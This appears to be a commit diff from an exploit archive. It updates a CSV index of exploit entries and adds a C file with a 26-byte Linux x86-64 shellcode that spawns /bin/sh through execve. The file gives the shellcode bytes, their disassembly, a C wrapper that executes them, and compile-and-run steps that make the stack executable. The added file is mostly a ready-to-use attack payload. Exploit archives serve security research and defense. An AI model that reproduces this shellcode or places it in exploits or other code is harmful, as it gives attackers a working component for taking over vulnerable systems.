DB: 2016-03-25

1 new exploits WebCalendar 1.2.4 Pre-Auth Remote Code Injection WebCalendar 1.2.4 - Pre-Auth Remote Code Injection Linux/x86_x64 - execve(/bin/sh) - 26 bytes
2016-03-25 05:01:47 +00:00 · 2016-03-25 05:01:47 +00:00 · 58061b1c3c
commit 58061b1c3c
parent dfc00ffd48
2 changed files with 50 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -16263,7 +16263,7 @@ id,file,description,date,author,platform,type,port
 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0
 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0
-18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0
+18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0
 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0
 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0
 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0
@ -35846,3 +35846,4 @@ id,file,description,date,author,platform,type,port
 39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0
 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
 39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
--- a/platforms/lin_x86-64/shellcode/39617.c
+++ b/platforms/lin_x86-64/shellcode/39617.c
@ -0,0 +1,48 @@
 /*
 ---------------------------------------------------------------------------------------------------
 Linux/x86_x64 - execve(/bin/sh) - 26 bytes
 Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 Om Asato Maa Sad-Gamaya |
 Tamaso Maa Jyotir-Gamaya |
 Mrtyor-Maa Amrtam Gamaya |
 Om Shaantih Shaantih Shaantih |
 ---------------------------------------------------------------------------------------------------
 Disassembly of section .text:
 0000000000400080 <.text>:
  400080:	eb 0b                	jmp    0x40008d
  400082:	5f                   	pop    %rdi
  400083:	48 31 d2             	xor    %rdx,%rdx
  400086:	48 89 d6             	mov    %rdx,%rsi
  400089:	b0 3b                	mov    $0x3b,%al
  40008b:	0f 05                	syscall
  40008d:	e8 f0 ff ff ff       	callq  0x400082
  400092:	2f                   	(bad)
  400093:	2f                   	(bad)
  400094:	62                   	(bad)
  400095:	69                   	.byte 0x69
  400096:	6e                   	outsb  %ds:(%rsi),(%dx)
  400097:	2f                   	(bad)
  400098:	73 68                	jae    0x400102
 ---------------------------------------------------------------------------------------------------
 How To Run
 $ gcc -o sh_shell sh_shell.c
 $ execstack -s sh_shell
 $ ./sh_shell
 ---------------------------------------------------------------------------------------------------
 */
 #include <stdio.h>
 char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";
 void main(int argc, char **argv)
 {
 	int (*func)();
 	func = (int (*)()) sh;
 	(int)(*func)();
 }